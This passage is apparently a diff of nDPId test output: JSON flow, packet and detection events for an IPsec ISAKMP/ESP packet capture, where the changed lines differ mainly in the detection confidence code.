ICKhR0a7HBjyUJnKQAAHAAAQATaubyY8VWsI4Z6WQt6ODtfgtlAogAAABwAAEAFkYhaxcMPMkFLeVrj\/VCjsI8u34M="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053740,"flow_last_seen":946752053740,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752053740,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946752053740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946752053740,"pkt":"eJS0JASgYDjgxTWgCABFAANMWXVAAD8R8lDAqAJkbe274TikEZQDOP4KAAAAAHlF92NQOWtZRVafIANU3ed\/ICMIAAAAAQAAAywjAAMQBR\/ZJ+3X4QcdMIisXdIsU3PhwmQh1kDFx7t6\/5ZlEuSALchlMYdKNbjiP8V7XG+VkbLRJCUkt8VxzgXkbFm0XsCoZkirqFU42hH5vsNJ8atCWBsd6Czcordw7Uj1SnFPEgr9gbj8i35Q1CZjzvPpOg2XDfTj1F8Qa2ARCJGgVHZvqP1dsh1WdQDacuVxFhIR4I+JjElx\/TMSBe7XFScWmAHiyJZSR\/sug\/9l+YQ6TuHMRfMyw3KI2RT8fG+dSAP0zafR9gLQtvvjBDzYY8iKmgi7bpirCVDBD+NLJOgYQPiaGccGg43WpShhzPaY9pQwjHUv0HhPXCiIwMiS1+WDH7aKM3GJWA+QGuo6B6RhGHpiNw0\/QhMLIZssGIumxah6sniQHHyxgczJ9Xpmc9SfxoDLs71VV7DTxSj4fXQ+P3Smlay8zndK9wSEVZaDoi0x59qZOkw4MisQa\/rd0PzZ13W4DYUfc65s+3SvwSd71wWNuPF1aT6QCOgVvz0pByFSSmtoYZPXYAUypnLWpoMf\/cAZvYUtnIBaKKOpXT2Wp\/THfyvQqR9mETUY35K8\/Vul2tXwO5Das\/wKyGAsnT0j5r\/ONfK4DgoV3TQDZSER7cGwpZouqrKNneh1Yrmj8+S213d0PH8sYjZnsCspvkEKJJqU6AWTIsNOAPenF2nyLcYHITE3VXYgMt\/73R88gw\/r8iNV3wi1xnTMMbihS+I1uGhtfa7i8iGxo1WtdHjzi+uaNejNmNuKGecVIIvbgZlAtgQpZTx\/SKEyYVNnCsb+ikwOsPCilLDHACCjyogntRNIwYKpEYFr+e+\/+c8LK3xW+JXYp397K3+8CyAXrfLDr86qSPz0RnN1qca+S5OojUUkz9PSOota5KYqGrM1KJeHU5WRdFAdeqNEjUcNydZHmuf2De1ON7eXeW3RrZ6EhSMo5oNKkQFRku4BP0G0FHVUFpY\/2QZ19IbwpXjpC1raZF3g\/EOPHq48CB+DMuJ15M+r\/F2tqhqHcYi8H2Vf42h8gHHpqTmNFaPgpt0\/"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053740,"flow_last_seen":946752053740,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752053740,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752053740,"flow_last_seen":946752053740,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752053740,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946752053856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946752053856,"pkt":"YDjgxTWgeJS0JASgCABFAADsOPIAAPcRnTNt7bvhwKgCZBGUOKQA2GSxAAAAAHlF92NQOWtZRVafIANU3ecuICMgAAAAAQAAAMwkAACwbCnQO0t8tiDbRI0Dx49OEdau4d\/WY4nre6ns6n3vAP909JuZ1MJBTo0cUkWOpcHHZSiemknv+kvvcs0Xa4fyeaoZ0\/\/TyH\/qVQorUwn5KKKhNef10qbGA8IojK5T4Q9tL6LdR5DoRQd5VxvHqhklCeGrMX+Xi\/tVgDc6u4AVew+xxWga6nIJW2nxk4XW411m7qykRZck9XPKemD9+TvNlS3b9braHWj2dkZaUQ=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946752054423,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946752054423,"pkt":"eJS0JASgYDjgxTWgCABFAACMWZNAAD8R9PLAqAJkbe274TikEZQAeO2UAAAAAHlF92NQOWtZRVafIANU3ecuICMIAAAAAgAAAGwwAABQJ30Fv5jPlEo6jF9WI+\/EQw5N3QovViNGDc2rMu6lmbrgZceFAAmNip6IhkJ08NB0auxPyCkplcHXICvksAjBFss5XRkKhPp+oCuvyg=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":206,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946749778420,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":946752055364,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":206,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946749778334,"flow_last_seen":946750900970,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946752055364,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":206,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946749778420,"flow_last_seen":946750802633,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":946752055364,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":206,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946749778334,"flow_last_seen":946750900970,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946752055364,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614840,"flow_last_seen":946752614840,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752614840,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946752614840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946752614840,"pkt":"eJS0JASgYDjgxTWgCABFAAMkYgZAAD8R6kXAqAJkbe27gykEAfQDEBL5k4UY8WP9qlcAAAAAAAAAACEgIv8AAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAEg3gVs0kfsAz\/oojyv8ckOUCC9t8U9Hs8TtFSpV4V4SadeUcjl1I6R0pqQZVaDsd9TMRSFPTs\/X3XBjLj0JUR+BRdCNpv5E0zCgTJb2152j9dZb2m6ovXFIp8oTUmXYrUNXHwK3xhWMtYAlhxUiaFpdLrhis3Tnpx5vqzW\/KwvDKQAAJOo+EM5r8NdoQKu1SZOr+dnCbtz\/h3c8Wr57Ju9JT5d7KQAAHAAAQASuZzovIprPIHqf1SfYquzmSO1wuwAAABwAAEAFB2gO4vR+1eCom3VMh7fIBdvef9w="} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614840,"flow_last_seen":946752614840,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752614840,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614840,"flow_last_seen":946752614840,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946752614840,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946752614864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946752614864,"pkt":"YDjgxTWgeJS0JASgCABFAABQ3r8AAPcR+F9t7buDwKgCZAH0KQQAPOaMk4UY8WP9qlcAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAAAAPa+lnAaTgFc15s6oA=="} 01516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946752614874,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946752614874,"pkt":"eJS0JASgYDjgxTWgCABFAAM8YghAAD8R6ivAqAJkbe27gykEAfQDKO58k4UY8WP9qlcAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAAAAPa+lnAaTgFc15s6oCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAEg3gVs0kfsAz\/oojyv8ckOUCC9t8U9Hs8TtFSpV4V4SadeUcjl1I6R0pqQZVaDsd9TMRSFPTs\/X3XBjLj0JUR+BRdCNpv5E0zCgTJb2152j9dZb2m6ovXFIp8oTUmXYrUNXHwK3xhWMtYAlhxUiaFpdLrhis3Tnpx5vqzW\/KwvDKQAAJOo+EM5r8NdoQKu1SZOr+dnCbtz\/h3c8Wr57Ju9JT5d7KQAAHAAAQASuZzovIprPIHqf1SfYquzmSO1wuwAAABwAAEAFB2gO4vR+1eCom3VMh7fIBdvef9w="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614924,"flow_last_seen":946752614924,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752614924,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946752614924,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946752614924,"pkt":"eJS0JASgYDjgxTWgCABFAANMYhRAAD8R6g\/AqAJkbe27gzikEZQDOIckAAAAAJOFGPFj\/apXtO8xDwLcetkuICMIAAAAAQAAAywjAAMQEQR4FktWGHCfTMOeDB5DCCEk1TjBbIVuH6Ow8PEQR2HAqgmEsEi91tj6w0Fl\/gqHsGTphqYxKHx374ZhXFCVCFsrbuih1wXQv\/zFKEysWV7hWx71Ib1EWGnSF6ACpmXeq9tEJQHpCTpnOEYmWAwfJZxAFG1OnNaS3S8jiMqfu8k5SURESCxQwn\/oDj44XGcb\/wH+3n\/w0ERHUrWxI7XUUx6N0bGNKKVdIreNUx1iplSJLx+XaaqzJ2CXv2t2mucULoUdiK3rY6KYRk9adCCkOCW7atCVw\/Dz1dGSbsk2vYONfcqNDLMYt2ZYhY6rXkGJ0P9dTbxkQmy\/d5ABuhXBlbDrDgBZnF3e3EIqESXWf10ABJrUTtH8fuPPsLHO6f4sY2g7aHNU8Qp6a33n577S9e0zHVnBE1rKvUNTXvQRJM9aEgiUjk8yQh1eN8M36KRgl50dSneUwheUIXt3VW6Ffa8UQQwXEqCOEwocOyh8l5apUYWbjmJmICItTdbUdshIeothNq+AaGbcmSmrgxESENFbz4+bjOazX5wNQ3jp8AD\/H\/uoUCEs7JoJvhgnns5zUqum44YuRVTjwwaury0NBMNBuu4ZgGTeGFcl7B7o6BqZGvDcAy7zwdOZ7x9FAnRlMgBSwRKy0viCxXa5bvI+7edDcnrj7KTgs8p1CIat6u5yHx7konwyUww+Q1V52uPn4XYhd1luucsOidTXgK9WEM5hw4pqV+g7jRklVxPfEc0\/Kikgnupz9puTWeX03gLFv2yHSQiL0x+LQ3XjdKX\/AnbjaxyYrCgJSZbi81\/vt5bGTcPi8Pj2T3vlfMSprOiAgGKBMtMpSv+sXHGZZcCN5+fBHupe9NPB1zmU\/lbE2gy\/ssnXeittwQpplx+hdLSgnUje\/QEleapeH1UGp\/AgtJ0vULj8bRWnmA3vZq1Y18v7z2gpAkMU7HYlsYPxb\/xN4NCGkOzFvB9rw+jFJsXMN6UUMb63VXOqMYBs5\/Tj9crfqAsUmo8Zv2MKa3377pttPhbPTZhVxiX+1mCt"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614924,"flow_last_seen":946752614924,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752614924,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946752614924,"flow_last_seen":946752614924,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946752614924,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946752615060,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946752615060,"pkt":"YDjgxTWgeJS0JASgCABFAADs3yQAAPcR915t7buDwKgCZBGUOKQA2NJOAAAAAJOFGPFj\/apXtO8xDwLcetkuICMgAAAAAQAAAMwkAACwpdyW7c2\/gJunZPldMG411Fh9XqpWg0EGVUCu6b4sTpdSkoNBs3\/CE4TFf8eat4rNXCNJJMOTO4t7zRLT4TmdXa92K0pHwl8LDGXFFZsrJdJPRItlhYnUch1AegTc7Y\/4aa7WDES\/4jdGVNuF2mpbAdVbrWRKvson1Aj1kzSzxGzvxugD+08NJGxTPaQqcVwY0uvTjefK3iDBSw\/nM82zQiIarpThHkv1rvf\/wg=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946752615613,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946752615613,"pkt":"eJS0JASgYDjgxTWgCABFAACMYhlAAD8R7MrAqAJkbe27gzikEZQAeNh6AAAAAJOFGPFj\/apXtO8xDwLcetkuICMIAAAAAgAAAGwwAABQWFXXJkXtrzhht+gv7jZ95VEVBCnWapg+MomShlwjPicL4QCRZxMSSVMpbVw66U7T50uDB+5pmL\/W4ALVgFtUgLJsZyv4SFTwa+0OoQ=="} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":225,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946752053740,"flow_last_seen":946752068592,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946752616641,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":225,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946752053636,"flow_last_seen":946752053697,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946752616641,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":225,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946752053740,"flow_last_seen":946752068592,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946752616641,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":225,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946752053636,"flow_last_seen":946752053697,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946752616641,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00571{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":226,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":226,"packets-processed":225,"total-skipped-flows":0,"total-l4-payload-len":106028,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":10,"current-active-flows":2,"total-active-flows":12,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":90,"global_ts_msec":946753056378} -00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":244,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946752614924,"flow_last_seen":946753058099,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13776,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":946753058099,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00805{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":244,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946752614840,"flow_last_seen":946753056444,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946753058099,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 